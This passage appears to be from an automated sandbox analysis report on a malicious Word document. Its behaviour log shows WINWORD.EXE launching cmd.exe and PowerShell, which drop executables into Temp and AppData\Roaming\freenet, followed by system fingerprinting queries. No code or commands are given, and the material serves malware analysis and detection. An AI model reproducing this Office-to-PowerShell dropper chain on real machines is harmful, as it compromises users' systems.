Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXEQueries volume information: C:\Users\user~1\AppData\Local\Temp\OICE_BD2C3A33-BC6C-4098-A16D-51A8AA25C09C.0\FLEA0B.tmp VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformationJump to behavior
